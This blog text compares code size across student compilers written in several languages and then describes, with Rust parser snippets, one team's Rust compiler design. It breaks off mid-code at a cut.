Why I think this is insightful
Rust (baseline)
Haskell: 1.0-1.6x the size depending on how you count for interesting reasons
C++: 1.4x the size for mundane reasons
Python: half the size because of fancy metaprogramming!
Rust (other group): 3x the size because of different design decisions!
Scala: 0.7x the size
OCaml: 1.0-1.6x the size depending on how you count, similar to Haskell

Why I think this is insightful

Now before you reply that amount of code (I compared both lines and bytes) is a terrible metric, I think that it can provide a good amount of insight in this case for a number of reasons. This is at least subjectively the most well controlled instance of different teams writing the same large program that I’ve ever heard of or read about.

Nobody (including me) knew I would ask this until after we were done, so nobody was trying to game the metric, everyone was just doing their best to finish the project quickly and correctly.
Everyone (with the exception of the Python project I’ll discuss later) was implementing a program with the sole goal of passing the same automated test suite by the same deadlines, so the results can’t be confounded much by some groups deciding to solve different/harder problems.
The project was done over a period of months, with a team, and needed to be gradually extended and pass both known and unknown tests. This means that it was helpful to write clean understandable code and not hack everything together.
Other than passing the course tests, the code wouldn’t be used for anything else, nobody would read it and being a compiler for a limited subset of Java to textual assembly it wouldn’t be useful.
No libraries other than the standard library were allowed, and no parsing helpers even if they’re in the standard library. This means the comparison can’t be confounded by powerful compiler libraries not used by all teams.
There were secret tests which we couldn’t see that were run once after the final submission deadline, which meant there was an incentive to write your own test code and make sure that your compiler was robust, correct and could handle tricky edge cases.
While everyone involved was a student, the teams I talk about are all composed of people I consider quite competent programmers. Everyone has at least 2 years of full time work experience doing internships, mostly at high end tech companies sometimes even working on compilers. Nearly all have been programming for 7-13 years and are enthusiasts who read a lot on the internet beyond their courses.
Generated code wasn’t counted, but grammar files and code that generated code was counted.

Thus I think the amount of code provides a decent approximation of how much effort each project took, and how much there would be to maintain if it was a longer term project. I think the smaller differences are also large enough to rule out extraordinary claims, like the ones I’ve read that say writing a compiler in Haskell takes less than half the code of C++ by virtue of the language.

Rust (baseline)

Me and one of my teammates had each written over 10k lines of Rust before, and my other teammate had written maybe 500 lines of Rust for some hackathon projects. Our compiler was 6806 lines by wc -l, 5900 source lines of code (not including blanks and comments), and 220kb by wc -c.

One thing I discovered is that these measures were related by approximately the same factors in the other projects where I checked, with minor exceptions that I’ll note. For the rest of the post when I refer to lines or amount I mean by wc -l, but this result means it doesn’t really matter (unless I note a difference) and you can convert with a factor.

I wrote another post describing our design, which passed all the public and secret tests. It also included a few extra features that we did for fun and not to pass tests, that probably added around 400 extra lines. Also around 500 lines of our total was unit tests and a test harness.

Haskell

The Haskell team was composed of two of my friends who’d written maybe a couple thousand lines of Haskell each before plus reading lots of online Haskell content, and a bunch more in other similar functional languages like OCaml and Lean. They had one other teammate who I didn’t know well but seems like a strong programmer and had used Haskell before.

Their compiler was 9750 lines by wc -l, 357kb and 7777 SLOC. This team also had the only significant differences between measure ratios, with their compiler being 1.4x the lines, 1.3x the SLOC, and 1.6x the bytes. They didn’t implement any extra features but passed 100% of public and secret tests.

It’s important to note that including the tests is the least fair to this team since they were the most thorough with correctness, with 1600 lines of tests, they caught a few edge cases that our team did not, they just happened to not be edge cases that were tested by the course tests. So not counting tests on both sides (8.1kloc vs 6.3kloc) their compiler was only 1.3x the raw lines.
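For anyone who wants to check the multipliers, they fall straight out of the numbers quoted so far. A tiny sketch (the helper names are made up):

```rust
// Size of one project relative to the baseline.
fn ratio(theirs: f64, ours: f64) -> f64 {
    theirs / ours
}

// Round to one decimal place, the precision used in the text.
fn round1(x: f64) -> f64 {
    (x * 10.0).round() / 10.0
}
```

With the figures above, `round1(ratio(9750.0, 6806.0))` is 1.4 for raw lines, `round1(ratio(7777.0, 5900.0))` is 1.3 for SLOC, and `round1(ratio(357.0, 220.0))` is 1.6 for bytes. Dropping the roughly 1600 and 500 lines of tests from each side gives `round1(ratio(8150.0, 6306.0))`, which is 1.3.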

I also am inclined towards bytes as the more reasonable measure of amount of code here because the Haskell project has longer lines on average since it doesn’t have lots of lines dedicated to just a closing brace, and its one-liner function chains aren’t split onto a bunch of lines by rustfmt.

Digging into the difference in size with one of my friends on the team, we came up with the following to explain the difference:

We used a hand-written lexer and recursive descent parsing, where they used an NFA to DFA lexer generator, and an LR parser and then a pass to turn the parse tree into an AST (Abstract Syntax Tree, a more convenient representation of the code). This took them substantially more code, 2677 lines compared to our 1705, for about an extra 1k lines.
They used a fancy generic AST type that transitioned to different type parameters as more information was added in each pass. This and more helper functions for rewriting are probably why their AST code has about 500 lines more than our implementation where we build with struct literals and mutate Option<_> fields to add information as passes progress.
They have about 400 more lines of code in their code generation that are mostly attributable to more abstraction necessary to generate and combine code in a purely functional way where we just use mutation and string writing.

These differences plus the tests explain all of the difference in lines. In fact our files for middle passes like constant folding and scope resolution are very close to the same size. However that still leaves some difference in bytes because of longer average lines, which I’d guess is because they require more code to rewrite their whole tree at every pass where we just use a visitor with mutation.
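The "struct literals plus mutated Option<_> fields" style mentioned in the list above looks roughly like the following. This is a minimal sketch with a made-up three-node AST, not the actual types from either compiler:

```rust
// Hypothetical miniature AST: `ty` starts empty and a later pass fills it in.
#[derive(Debug, PartialEq, Clone, Copy)]
enum Type {
    Int,
    Bool,
}

#[derive(Debug)]
enum ExprKind {
    IntLit(i32),
    BoolLit(bool),
    Add(Box<Expr>, Box<Expr>),
}

#[derive(Debug)]
struct Expr {
    kind: ExprKind,
    ty: Option<Type>, // None until the type checking pass runs
}

impl Expr {
    // The parser builds nodes with a struct literal and no type information.
    fn new(kind: ExprKind) -> Expr {
        Expr { kind, ty: None }
    }
}

// A later pass mutates the tree in place instead of rebuilding it.
fn check_types(e: &mut Expr) -> Result<Type, String> {
    let ty = match &mut e.kind {
        ExprKind::IntLit(_) => Type::Int,
        ExprKind::BoolLit(_) => Type::Bool,
        ExprKind::Add(l, r) => {
            if check_types(l)? != Type::Int || check_types(r)? != Type::Int {
                return Err("operands of + must be int".to_string());
            }
            Type::Int
        }
    };
    e.ty = Some(ty);
    Ok(ty)
}
```

The tradeoff is that nothing in the types stops a later pass from reading `ty` before it has been filled in, which is the kind of mistake a generic AST that changes type parameters per pass rules out.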

Bottom line, I’d say setting aside design decisions Rust and Haskell are similarly expressive, with maybe a slight edge to Rust because of ability to easily use mutation when it’s convenient. It was also interesting to learn that my choice to use a recursive descent parser and hand-written lexer paid off, this was a risk since it wasn’t what the professor recommended and taught but I figured it would be easier and was right.

Haskell fans may object that this team probably didn’t use Haskell to its fullest potential and if they were better at Haskell they could have done the project with way less code. I believe that someone like Edward Kmett could write the same compiler in substantially fewer lines of Haskell, in that my friend’s team didn’t use a lot of fancy super advanced abstractions, and weren’t allowed to use fancy combinator libraries like lens. However, this would come at a cost to how difficult it would be to understand the compiler. The people on the team are all experienced programmers, they knew that Haskell can do extremely fancy things but chose not to pursue them because they figured it would take more time to figure them out than they would save and make their code harder for the teammates who didn’t write it to understand. This seems like a real tradeoff to me and the claim I’ve seen of Haskell being magical for compilers devolves into something like “Haskell has an extremely high skill cap for writing compilers as long as you don’t care about maintainability by people who aren’t also extremely skilled in Haskell” which is less generally applicable.

Another interesting thing to note is that at the start of every offering of the course the professor says that students can use any language that can run on the school servers, but issues a warning that teams using Haskell have the highest variance in mark of any language, with many teams using Haskell overestimating their ability and crashing and burning then getting a terrible mark, more than any other language, while some Haskell teams do quite well and get perfect like my friends.

C++

Next I talked to my friend who was on a team using C++, I only knew one person on this team, but C++ is used in multiple courses at UWaterloo so presumably everyone on the team had C++ experience.

Their project was 8733 raw lines and 280kb not including test code but including around 500 lines of extra features, making it 1.4x the size of our non-test code, which also had around 500 lines of extra features. They passed 100% of public tests but only passed 90% of secret tests, presumably because they didn’t implement the fancy array vtables required by the spec, which take maybe 50-100 lines of code.

I didn’t dig very deeply into these differences with my friend. I speculate that it’s mostly explained by:

Them using an LR parser and tree rewriter instead of a recursive descent parser
The lack of sum types and pattern matching in C++, which we used extensively and were very helpful.
Needing to duplicate all the signatures in header files, which Rust doesn’t have.

Another thing we compared was compile times. On my laptop our compiler takes 9.7s for a clean debug build, 12.5s for clean release, and 3.5s for incremental debug. My friend didn’t have timings on hand for their C++ build (using parallel make) but said those sounded quite similar to his experience, with the caveat that they put the implementations of a bunch of small functions in header files to save the signature duplication at the cost of longer times (this is also why I can’t measure the pure header file line count overhead).

Python

I have one friend who is an extraordinarily good programmer who chose to do the project alone and in Python. She also implemented more extra features (for fun) than any other team including an SSA intermediate representation with register allocation and other optimizations. On the other hand because she was working alone and implementing a bunch of extra features, she dedicated the least effort to code quality, for example by throwing an undifferentiated exception for all errors (relying on backtraces for debugging) instead of having error types and messages like we did.

Her compiler was 4581 raw lines and passed all public and secret tests. She also implemented way more extra features than any other team I compare with, but it’s hard to determine how much extra code that took because many of her extra features were more powerful versions of simple things everyone needed to implement like constant folding and code generation. The extra features probably account for 1000-2000 lines at least though, so I’m confident her code was at least twice as expressive as ours.

One large part of this difference is likely dynamic typing. Our ast.rs alone has 500 lines of type definitions, and there are many more types defined throughout our compiler. We also are always constrained in what we do by the type system. For example we need infrastructure for ergonomically adding new info to our AST as it progresses through passes and accessing that later. Whereas in Python you can just set new fields on your AST nodes.

Powerful metaprogramming also explains part of the difference. For example although she used an LR parser instead of a recursive descent parser, in her case I think it needed less code, because instead of a tree rewriting pass, her LR grammar included Python code snippets to construct the AST, which the generator could turn into Python functions using eval. Part of the reason we didn’t use an LR parser is because constructing an AST without a tree rewriting pass would require a lot of ceremony (either generating Rust files or procedural macros) to tie the grammar to snippets of Rust code.

Another example of the power of metaprogramming and dynamic typing is that we have a 400 line file called visit.rs that is mostly repetitive boilerplate code implementing a visitor on a bunch of AST structures. In Python this could be a short ~10 line function that recursively introspects on the fields of the AST node and visits them (using the __dict__ attribute).

As a fan of Rust and statically typed languages in general I’m inclined to point out that the type system is very helpful for avoiding bugs and for performance. Fancy metaprogramming can also make it more difficult to understand how code works. However, this comparison surprised me in that I hadn’t expected the difference in the amount of code to be quite so large. If the difference in general is really close to needing to write twice the amount of code, I still think Rust is worth the tradeoff, but 2x is nothing to sneeze at and in the future I’ll be more inclined to hack something together in Ruby/Python if I just need to get it done quickly without a team and then throw it away after.

Rust (other group)

The last comparison I did and also the most interesting to me was with my friend who did the project in Rust with one teammate (who I didn’t know). My friend had a good amount of Rust experience having contributed to the Rust compiler and done lots of reading, I don’t know about his teammate.

Their project was 17,211 raw lines, 15k source lines, and 637kb not including test code and generated code. It had no extra features and passed only 4/10 secret tests and 90% of the public code generation tests, because they didn’t find the time before the final deadline to implement fancier pieces of the spec. This is 3 times the size of our compiler written in the same language, but with strictly less functionality!

This result was really surprising to me and dwarfed all the between-language differences I had investigated thus far. So we compared wc -l file size listings, as well as spot checking how we each implemented some specific things that had very different code sizes.

It seems to come down to consistently making different design decisions. For example, their front end (lexing, parsing, AST building) is 7597 raw lines to our 2164. They used a DFA-based lexer and LALR(1) parser, but the other groups did similar things without as much code. Looking at their weeder file, I noticed a number of different design decisions:

They chose to use a fully typed parse tree instead of the standard string-based homogeneous parse tree. This presumably required a lot more type definitions and additional transformation code in the parsing stage or a more complex parser generator.
They used TryFrom trait implementations for converting between the parse tree types and the AST types while validating their correctness. This led to tons of 10-20 line impl blocks. We used functions that returned Result types to accomplish the same thing, which had less line overhead and also freed us from the type structure a bit more, making parameters and re-use easier. Some things that for us were single line match branches were 10 line impl statements for them.
Our types were structured in a way that required less copy-pasting. For example they used separate is_abstract, is_native and is_static fields whose constraint checking code needed to be copy-pasted twice, once for their void-typed methods and once for their methods with a return type, with slight modifications. Whereas for us void was just a special type, and we came up with a taxonomy of modifiers into mode and visibility enums that enforced the constraints at the type level and constraint errors were generated in the default case of the match statement that translated the modifier sets to the mode and visibility.
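Here is a minimal sketch of what the mode and visibility taxonomy from the last point can look like. All the names and the exact set of legal combinations are assumptions for illustration, not the real rules from the course spec or the actual compiler:

```rust
// Hypothetical names throughout; the legal combinations below are a
// simplified assumption, not the full course rules.
#[derive(Debug, PartialEq, Clone, Copy)]
enum Modifier {
    Public,
    Protected,
    Abstract,
    Static,
    Native,
    Final,
}

#[derive(Debug, PartialEq)]
enum Visibility {
    Public,
    Protected,
}

#[derive(Debug, PartialEq)]
enum Mode {
    Normal,
    Abstract,
    Static,
    StaticNative,
    Final,
}

// Translate a raw modifier set into the two enums. Because the enums can
// only represent valid states, every invalid set lands in a default arm.
fn classify(mods: &[Modifier]) -> Result<(Visibility, Mode), String> {
    let has = |m: Modifier| mods.contains(&m);
    let visibility = match (has(Modifier::Public), has(Modifier::Protected)) {
        (true, false) => Visibility::Public,
        (false, true) => Visibility::Protected,
        _ => return Err("expected exactly one of public or protected".to_string()),
    };
    let mode = match (
        has(Modifier::Abstract),
        has(Modifier::Static),
        has(Modifier::Native),
        has(Modifier::Final),
    ) {
        (false, false, false, false) => Mode::Normal,
        (true, false, false, false) => Mode::Abstract,
        (false, true, false, false) => Mode::Static,
        (false, true, true, false) => Mode::StaticNative,
        (false, false, false, true) => Mode::Final,
        // Every other combination is invalid, so one default arm reports it.
        _ => return Err(format!("invalid modifier combination: {:?}", mods)),
    };
    Ok((visibility, mode))
}
```

Later passes then match on `Mode` and `Visibility` directly and never have to re-check combinations of booleans.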

I didn’t look at the code of the analysis passes of their compiler, but they are similarly large. I talked to my friend and it seems they didn’t implement anything like the visitor infrastructure that we did. I’m guessing this along with some other smaller design differences account for the size difference of this part. The visitor allowed our analysis passes to only pay attention to the parts of the AST they needed instead of having to pattern match down through the entire AST structure, saving a lot of code.
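The visitor idea can be sketched in a few lines. This is a made-up miniature AST rather than the real visit.rs: the trait's default methods walk the whole tree, and a pass overrides only the node kinds it cares about.

```rust
// Hypothetical miniature AST.
enum Expr {
    Num(i64),
    Var(String),
    Add(Box<Expr>, Box<Expr>),
    Neg(Box<Expr>),
}

enum Stmt {
    ExprStmt(Expr),
    Block(Vec<Stmt>),
}

// Default methods traverse everything; a pass overrides only what it needs.
trait Visitor {
    fn visit_stmt(&mut self, s: &Stmt) {
        walk_stmt(self, s);
    }
    fn visit_expr(&mut self, e: &Expr) {
        walk_expr(self, e);
    }
}

fn walk_stmt<V: Visitor + ?Sized>(v: &mut V, s: &Stmt) {
    match s {
        Stmt::ExprStmt(e) => v.visit_expr(e),
        Stmt::Block(stmts) => {
            for s in stmts {
                v.visit_stmt(s);
            }
        }
    }
}

fn walk_expr<V: Visitor + ?Sized>(v: &mut V, e: &Expr) {
    match e {
        Expr::Num(_) | Expr::Var(_) => {}
        Expr::Add(l, r) => {
            v.visit_expr(l);
            v.visit_expr(r);
        }
        Expr::Neg(inner) => v.visit_expr(inner),
    }
}

// An analysis pass that only cares about variable references. It never
// mentions statements, blocks, or the other expression kinds.
struct VarCollector {
    names: Vec<String>,
}

impl Visitor for VarCollector {
    fn visit_expr(&mut self, e: &Expr) {
        if let Expr::Var(name) = e {
            self.names.push(name.clone());
        }
        walk_expr(self, e); // keep descending into children
    }
}
```

The `walk_*` functions are the repetitive boilerplate, written once. Each pass then only pays for the cases it handles.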

Their code generation is 3594 lines where ours is 1560. I looked at their code for this and it seems that nearly all of the difference is that they chose to have an intermediate data structure for assembly instructions, where we just used string formatting to directly output assembly. This required defining types and output functions for all the instructions and operand types they used. It also meant that constructing assembly instructions took way more code, where we might have a formatting statement that used terse instructions like mov ecx, [edx], they needed a giant statement rustfmt split over 6 lines which constructed the instruction with a bunch of intermediate nested types for the operands involving 6 levels of nested parentheses at its deepest. We could also output blocks of related instructions like a function preamble in one formatting statement, where they had to do the full construction for each instruction.
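For a sense of how little code the string formatting approach needs, here is a minimal sketch. The function names and the frame layout are assumptions for illustration, not the actual code from our compiler:

```rust
use std::fmt::Write;

// Emit a whole function prologue as one formatted block of textual assembly.
// Writing to a String cannot fail, so the result is unwrapped.
fn emit_prologue(out: &mut String, label: &str, frame_bytes: u32) {
    write!(
        out,
        "{}:\n    push ebp\n    mov ebp, esp\n    sub esp, {} ; space for locals\n",
        label, frame_bytes
    )
    .unwrap();
}

// A single terse instruction is just one formatting statement.
fn emit_load(out: &mut String, dst: &str, addr_reg: &str) {
    writeln!(out, "    mov {}, [{}]", dst, addr_reg).unwrap();
}
```

The cost is that nothing checks the operands: a typo in a register name only shows up when the assembler runs.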

Our team considered using such an abstraction. It would make it easier to have the option of either outputting textual assembly or directly emitting machine code, however that wasn’t a requirement of the course. The same thing could also be accomplished with less code and better performance using an X86Writer trait with methods like push(reg: Register). Another angle we considered was that it might make debugging and testing easier, but we realized that looking at the generated textual assembly would actually be easier to read and test with snapshot testing as long as we inserted comments liberally. But we (apparently correctly) predicted that it would take a lot of extra code, and there wasn’t any real benefit given what we knew we were going to need, so we didn’t bother.
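A rough sketch of the `X86Writer` idea follows. Only the trait name and `push(reg: Register)` come from the text above; the other method, the two implementations and the small register set are assumptions made for illustration.

```rust
// Hypothetical sketch: only the trait name and `push(reg: Register)` come
// from the text; everything else is assumed.
#[derive(Clone, Copy)]
enum Register {
    Eax,
    Ecx,
    Esp,
    Ebp,
}

impl Register {
    fn name(self) -> &'static str {
        match self {
            Register::Eax => "eax",
            Register::Ecx => "ecx",
            Register::Esp => "esp",
            Register::Ebp => "ebp",
        }
    }

    // Register number used in x86 instruction encodings.
    fn code(self) -> u8 {
        match self {
            Register::Eax => 0,
            Register::Ecx => 1,
            Register::Esp => 4,
            Register::Ebp => 5,
        }
    }
}

trait X86Writer {
    fn push(&mut self, reg: Register);
    fn mov(&mut self, dst: Register, src: Register);
}

// Backend 1: textual assembly.
struct TextWriter {
    out: String,
}

impl X86Writer for TextWriter {
    fn push(&mut self, reg: Register) {
        self.out.push_str(&format!("    push {}\n", reg.name()));
    }
    fn mov(&mut self, dst: Register, src: Register) {
        self.out.push_str(&format!("    mov {}, {}\n", dst.name(), src.name()));
    }
}

// Backend 2: raw machine code bytes.
struct MachineCodeWriter {
    bytes: Vec<u8>,
}

impl X86Writer for MachineCodeWriter {
    fn push(&mut self, reg: Register) {
        self.bytes.push(0x50 + reg.code()); // push r32
    }
    fn mov(&mut self, dst: Register, src: Register) {
        self.bytes.push(0x89); // mov r/m32, r32
        self.bytes.push(0xC0 | (src.code() << 3) | dst.code()); // register-direct ModRM
    }
}

// Code generation is written once against the trait.
fn emit_prologue<W: X86Writer>(w: &mut W) {
    w.push(Register::Ebp);
    w.mov(Register::Ebp, Register::Esp);
}
```

Because the generator calls methods instead of building instruction values, no intermediate instruction data structure is ever allocated, and each call site stays a single line.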

A good comparison is with the intermediate representation the C++ group used as an extra feature, which only took them closer to 500 extra lines. They used a very simple structure (making for simple type definitions and construction code) that used operations close to what Java required. This meant that their IR was much smaller (and thus required less construction code) than the resulting assembly, since many language operations like calls and casts expanded into many assembly instructions. They also say it really helped debugging since it cut out a lot of the cruft and was easy to read. The higher level representation also allowed them to do some simple optimizations on their IR. The C++ team came up with a really nice design which got them much more benefit with much less code.

Overall it seems like the 3x size multiplier is due to consistently making different design decisions both large and small in the direction of larger code. They implemented a number of abstractions that we didn’t which added more code, and missed out on some of the abstractions we implemented which led to less code.

This result really surprised me, I knew design decisions mattered but I wouldn’t have guessed beforehand that they would lead to any differences this large, given that I was only surveying people that I consider strong competent programmers. Of all the results from this comparison, this is the one I learned the most from. Something that I think helped was that I had read a lot about how to write compilers before I took the course, so I could take advantage of clever designs other people had come up with and found worked well like AST visitors and recursive descent parsing even when they weren’t taught in the course.

One thing this really made me think about is the cost of abstraction. Abstractions may make things easier to extend in the future, or guard against certain types of errors, but they need to be considered against the fact that you may end up with 3 times the amount of code to understand and refactor, 3 times the amount of possible locations for bugs and less time left to spend on testing and further development. Our course was unlike the real world in that we knew exactly what we needed to implement and that we’d never touch the code afterwards, which eliminates the benefits of pre-emptive abstraction. However if you were going to challenge me to extend a compiler with an arbitrary feature you’d tell me later, and I had to pick which compiler I’d start from, I’d choose ours even setting aside familiarity, because there’d simply be much less code that I’d need to understand how to change, and I could potentially choose a better abstraction for the requirements (like the C++ team’s IR) once I knew how I needed to extend things.

It also solidified the taxonomy in my head of abstractions that you expect to remove code given only your current requirements, like our visitor pattern, and abstractions you expect to add code given only your immediate requirements, but that may provide extensibility, debuggability or correctness benefits.

Scala

I also talked to a friend of mine who did the project in a previous term using Scala, but the project and tests were the exact same ones. Their compiler was 4141 raw lines and ~160kb of code not counting tests. They passed 8/10 secret tests and 100% of public tests and didn’t implement any extra features. So comparing with our 5906 lines without extra features and tests, their compiler is 0.7x the size.

One design factor in their low line count was that they used a different approach to parsing. The course allowed you to use a command line LR table generator tool that the course provided, which this team used but no other team I mention did. This saved them having to implement an LR table generator. They also managed to avoid writing the LR grammar using a 150 line Python script which scraped a Java grammar web page they found online and translated it into the input format of the generator tool. They still needed to do some tree building in Scala but overall their parsing stage came in at 1073 lines to our 1443, where most other teams’ use of LR parsing led to larger parsers than our recursive descent one.

The rest of their compiler was similarly smaller than ours though without any obvious large design differences, although I didn’t dig into the code. I suspect this is probably due to differences in expressiveness between Scala and Rust. Scala and Rust have similar functional programming features helpful for compilers, like pattern matching, but Scala’s managed memory saves on code required to make the Rust borrow checker happy. Scala also has more miscellaneous syntactic sugar than Rust.

OCaml

Since my team had all interned at Jane Street, the other language we considered using was OCaml. We decided on Rust, but I was curious about how OCaml might have turned out, so I talked to someone else I knew had interned at Jane Street, and they had indeed done their compiler in OCaml with two other former Jane Street interns.

Their compiler was 10914 raw lines and 377kb including a small amount of test code and no extra features. They passed 9/10 secret tests and all public tests.

Like other groups it looks like a lot of the size difference is due to them using an LR parser generator and tree rewriting for parsing, as well as a regex->NFA->DFA conversion pipeline for lexing. Their front-end (lexing+parsing+AST construction) is 5548 lines where ours is 2164, with similar ratios for bytes. They also used expect tests for their parser where we used similar snapshot tests that put the expected output outside the code, so their parser tests were ~600 lines of that total where ours were ~200.

That leaves 5366 lines (461 lines of which is interface files with just type declarations) for the rest of their compiler and 4642 for ours, only 1.15x larger if you count interface files and basically the same size if you don’t count them. So it looks like setting aside our parsing design decisions, Rust and OCaml seem similarly expressive except that OCaml needs interface files and Rust doesn’t.

Conclusion

Overall I’m very glad I did this comparison, I learned a lot from it and was surprised many times. I think my overall takeaway is that design decisions make a much larger difference than the language, but the language matters insofar as it gives you the tools to implement different designs.

Writing a Compiler in Rust

2019-04-18T00:00:00+00:00

During my final term at UWaterloo I took the CS444 compilers class with a project to write a compiler from a substantial subset of Java to x86, with a language and two teammates of your choice. My group of three chose to write our compiler in Rust and it was a fun experience. We spent time coming to design decisions that worked out really well and used Rust’s strengths. Our compiler ended up being around 6800 lines of Rust and I personally put in around 60 hours of solid coding and more on code review and design. In this post I’ll go over some of the design decisions we made and some thoughts on what it was like using Rust.

Lexing and Parsing

The lectures for the course recommended writing an NFA to DFA compiler to implement the lexer, and writing an LR(1) parser generator for the parser, then having a separate “weeding” pass to construct a final AST (Abstract Syntax Tree) and validate it in various ways.

I suggested that we should try using a hand-written lexer and recursive descent parser instead, and my teammates agreed. A recursive descent parser allowed us to put all the code to parse, validate, and create the AST node in one place. We figured writing a pass to rewrite and validate the raw parse tree into a strongly typed AST would be about as much code as a recursive descent parser, except with the additional work of having to implement an LR(1) parser generator.

The AST we produced made good use of Rust’s type system, including extensive use of enum sum types to handle variants of types, expressions and statements. We also used Option and Vec extensively, as well as Box to allow type recursion. Our AST types looked like this:

// We preserve source span information using a `Spanned` struct
pub type Type = Spanned<TypeKind>;

#[derive(Clone, Debug, PartialEq, Eq, Hash)]
pub enum TypeKind {
    Array(Box<Type>),
    Ref(TypeRef),
    Int,
    Byte,
    // ...
}

// ...

#[derive(Clone, Debug)]
pub struct InterfaceDecl {
    pub name: String,
    pub extends: Vec<TypeRef>,
    pub methods: Vec<Signature>,
}

We produced this using a Parser struct with functions for parsing different constructs that could also return parse errors. The Parser struct had a number of helper functions to easily consume and inspect tokens, using the power of abstraction present in a full programming language to get closer to the brevity of a parser generator grammar DSL. Here’s an example of what our parser looked like:

#[derive(Clone, Debug)]
pub enum ParseError {
    Unexpected(SpannedToken),
    DuplicateModifier(SpannedToken),
    MultipleVisibilities,
    // ...
}

pub struct Parser<'a> {
    tokens: &'a [SpannedToken],
    pos: usize,
}

// ...

fn parse_for_statement(&mut self) -> PResult<ForStatement> {
    self.eat(&Token::For)?;
    self.eat(&Token::LParen)?;
    let init = self.parse_unless_and_eat(Token::Semicolon, Self::parse_for_init)?;
    let condition = self.parse_unless_and_eat(Token::Semicolon, Self::parse_expr)?;
    let update = self.parse_unless_and_eat(Token::RParen, Self::parse_statement_expr)?;
    let body = self.parse_statement()?;
    Ok(ForStatement { init, condition, update, body })
}

// ...

Backtracking

Mostly our parser takes the form of an LL(1) parser, which looks ahead one token to decide how it should parse. But some constructs require unlimited lookahead to parse. For example (java.lang.String)a should parse as a parenthesized field access chain on the ‘java’ variable except for the a at the end, which makes it a cast expression. In fact even LR(1) parsers can’t parse this specific case properly, and the recommended hack is to parse the inside of the parens as an “expression” and then just validate in the weeder that the expression is actually a type.

We solve this problem using backtracking, which is where we can save a position in the token stream, speculatively parse the following input as one construct, and then roll back to that saved position if that parsing fails. This can cause non-linear parse times on pathological input, but pathological cases don’t occur non-maliciously in practice, especially if backtracking is only used in some situations rather than for the whole parser.

An alternative strategy to backtracking that works in some situations is to parse the common elements of both nonterminals that could follow, then once the parser reaches the point where it can decide, it calls the specific non-terminal function passing what has been parsed so far as arguments. We use this strategy for deciding between parsing classes and interfaces and between parsing methods and constructors, by parsing the modifiers first, then looking ahead, then parsing the rest passing the parsed modifiers as arguments.

We have Rust helper functions that make backtracking really easy by trying one parse and then trying another if the first parse returns an Err:

// Unlike the Java spec, we can have arguments like `allow_minus` to avoid
// massive duplication in the case of minor special cases.
// `allow_minus` makes sure `(a)-b` parses as `int-int` rather than `(Type)(-int)`
fn parse_prim_expr(&mut self, allow_minus: AllowMinus) -> PResult<Box<Expr>> {
    let cur = &self.tokens[self.pos];
    let mut lhs = match &cur.tok {
        Token::LParen => self.one_of(Self::parse_cast_expr, Self::parse_paren_expr),
        // ...
    };
    // ...
}
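A helper like `one_of` can be quite small. The sketch below is a guess at its shape, not our actual code: tokens are plain `char`s, errors are `String`s, and `parse_cast` and `parse_paren` are toy stand-ins for `parse_cast_expr` and `parse_paren_expr`. What it shows is the save, try, rewind, retry sequence described above.

```rust
// Hypothetical, simplified types: the real parser works on `SpannedToken`s and
// returns AST nodes. Here tokens are chars and results are strings.
type PResult<T> = Result<T, String>;

pub struct Parser<'a> {
    tokens: &'a [char],
    pos: usize,
}

impl<'a> Parser<'a> {
    pub fn new(tokens: &'a [char]) -> Self {
        Parser { tokens, pos: 0 }
    }

    // Consume one token if it matches, otherwise report an error.
    fn eat(&mut self, expected: char) -> PResult<()> {
        match self.tokens.get(self.pos) {
            Some(&c) if c == expected => {
                self.pos += 1;
                Ok(())
            }
            other => Err(format!("expected {:?}, found {:?}", expected, other)),
        }
    }

    // Try `first`; if it fails, rewind to the saved position and try `second`.
    fn one_of<T>(
        &mut self,
        first: fn(&mut Self) -> PResult<T>,
        second: fn(&mut Self) -> PResult<T>,
    ) -> PResult<T> {
        let saved = self.pos;
        match first(self) {
            Ok(v) => Ok(v),
            Err(_) => {
                self.pos = saved;
                second(self)
            }
        }
    }

    // Toy "cast": `(t)` followed by an operand `a`.
    fn parse_cast(&mut self) -> PResult<String> {
        self.eat('(')?;
        self.eat('t')?;
        self.eat(')')?;
        self.eat('a')?;
        Ok("cast".to_string())
    }

    // Toy "parenthesized expression": `(t)` with nothing required after it.
    fn parse_paren(&mut self) -> PResult<String> {
        self.eat('(')?;
        self.eat('t')?;
        self.eat(')')?;
        Ok("paren".to_string())
    }

    pub fn parse_prim(&mut self) -> PResult<String> {
        self.one_of(Self::parse_cast, Self::parse_paren)
    }
}

// Convenience wrapper for trying the parser on a string.
pub fn parse_str(src: &str) -> PResult<String> {
    let tokens: Vec<char> = src.chars().collect();
    Parser::new(&tokens).parse_prim()
}
```

On the input `(t)` the cast attempt consumes three tokens before failing, so restoring `pos` is what lets the second attempt start from the opening paren again.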

Pratt expression parsing

Instead of parsing expressions with precedence using many grammar levels, we use a Pratt parsing / precedence climbing system. This algorithm allows specifying the operators as a table with a “binding power” integer, with higher binding power for operators with higher precedence. This is both easier and more efficient for parsing expressions with many levels of precedence.

Instead of using data tables like in the canonical Pratt parser implementation, we used Rust functions with match statements, which fill the same purpose but with more power and no need to keep a data structure around:

fn binding_power(cur: &SpannedToken) -> Option<u8> {
    match &cur.tok {
        Token::Operator(op) => match op {
            Op::Times | Op::Divide | Op::Modulo => Some(12),
            Op::Plus | Op::Minus => Some(11),
            Op::Greater | Op::GreaterEqual | Op::Less | Op::LessEqual => Some(9),
            Op::Equal | Op::NotEqual => Some(8),
            Op::And => Some(7),
            // ...
        },
        Token::Instanceof => Some(9),
        _ => None,
    }
}
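For readers who haven't seen precedence climbing, here is a minimal sketch of the loop that consumes such a `binding_power` function. It is not our parser: the `Tok` type is a made-up toy, and it evaluates the expression directly instead of building AST nodes, but the control flow is the standard technique.

```rust
// Hypothetical toy tokens; the real parser uses `SpannedToken` and builds AST nodes.
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum Tok {
    Num(i64),
    Plus,
    Minus,
    Times,
    Divide,
}

// Same idea as the `binding_power` function above, restricted to four operators.
fn binding_power(tok: Tok) -> Option<u8> {
    match tok {
        Tok::Times | Tok::Divide => Some(12),
        Tok::Plus | Tok::Minus => Some(11),
        Tok::Num(_) => None,
    }
}

pub struct ExprParser<'a> {
    tokens: &'a [Tok],
    pos: usize,
}

impl<'a> ExprParser<'a> {
    pub fn new(tokens: &'a [Tok]) -> Self {
        ExprParser { tokens, pos: 0 }
    }

    fn parse_atom(&mut self) -> Option<i64> {
        match self.tokens.get(self.pos) {
            Some(&Tok::Num(n)) => {
                self.pos += 1;
                Some(n)
            }
            _ => None,
        }
    }

    // Parse (and here directly evaluate) an expression, only consuming
    // operators whose binding power is strictly greater than `min_bp`.
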